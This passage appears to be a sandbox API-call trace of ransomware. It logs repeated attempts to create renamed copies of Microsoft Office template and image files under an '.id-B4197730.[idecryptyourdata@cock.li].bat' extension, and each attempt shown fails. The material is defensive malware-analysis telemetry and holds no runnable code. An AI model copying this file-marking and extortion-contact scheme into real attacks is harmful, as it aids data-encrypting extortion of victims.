returned 1 [0176.765] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.765] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR10F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir10f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.765] CloseHandle (hObject=0x530) returned 1 [0176.769] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.769] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR11F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir11f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.769] CloseHandle (hObject=0x37c) returned 1 [0176.771] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.771] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR12F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir12f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.771] CloseHandle (hObject=0x37c) returned 1 [0176.772] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.772] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR13F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir13f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.772] CloseHandle (hObject=0x37c) returned 1 [0176.773] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.773] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR14F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir14f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.773] CloseHandle (hObject=0x37c) returned 1 [0176.774] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.774] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR15F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir15f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.774] CloseHandle (hObject=0x37c) returned 1 [0176.775] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.775] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR16F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir16f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.775] CloseHandle (hObject=0x37c) returned 1 [0176.776] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.776] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR17F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir17f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.776] CloseHandle (hObject=0x37c) returned 1 [0176.777] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.777] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR18F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir18f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.778] CloseHandle (hObject=0x37c) returned 1 [0176.779] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.779] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR19F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir19f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.779] CloseHandle (hObject=0x37c) returned 1 [0176.780] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.780] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.780] CloseHandle (hObject=0x37c) returned 1 [0176.893] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.893] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.893] CloseHandle (hObject=0x534) returned 1 [0176.894] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.894] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.894] CloseHandle (hObject=0x534) returned 1 [0176.897] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.898] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicelegant.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicelegant.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.898] CloseHandle (hObject=0x534) returned 1 [0176.899] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.899] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicsimple.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicsimple.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.899] CloseHandle (hObject=0x534) returned 1 [0176.901] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.901] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicstylish.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicstylish.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.901] CloseHandle (hObject=0x534) returned 1 [0176.902] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.902] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwcapitalized.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwcapitalized.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.902] CloseHandle (hObject=0x534) returned 1 [0176.903] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.903] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwclassic.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwclassic.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.903] CloseHandle (hObject=0x534) returned 1 [0176.904] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.904] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwnumbered.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwnumbered.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.904] CloseHandle (hObject=0x534) returned 1 [0176.905] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.905] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\casual.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\casual.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.906] CloseHandle (hObject=0x534) returned 1 [0176.906] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.906] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\centered.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\centered.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.907] CloseHandle (hObject=0x534) returned 1 [0176.908] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.908] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Classic.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\classic.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.908] CloseHandle (hObject=0x534) returned 1 [0176.909] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.909] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Default.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\default.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.909] CloseHandle (hObject=0x534) returned 1 [0176.910] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.911] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesdistinctive.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesdistinctive.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.911] CloseHandle (hObject=0x534) returned 1 [0176.911] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.912] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linessimple.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linessimple.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.912] CloseHandle (hObject=0x534) returned 1 [0176.913] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.913] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesstylish.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesstylish.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.913] CloseHandle (hObject=0x534) returned 1 [0176.914] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.914] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\minimalist.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\minimalist.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.914] CloseHandle (hObject=0x534) returned 1 [0176.916] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.916] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\shaded.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\shaded.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.916] CloseHandle (hObject=0x534) returned 1 [0176.917] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.917] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.917] CloseHandle (hObject=0x534) returned 1 [0176.918] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.918] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\word2013bw.dotx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\word2013bw.dotx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.918] CloseHandle (hObject=0x534) returned 1 [0176.919] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.919] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Init.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\reviewrouting_init.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.919] CloseHandle (hObject=0x534) returned 1 [0176.920] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.920] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ReviewRouting_Review.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 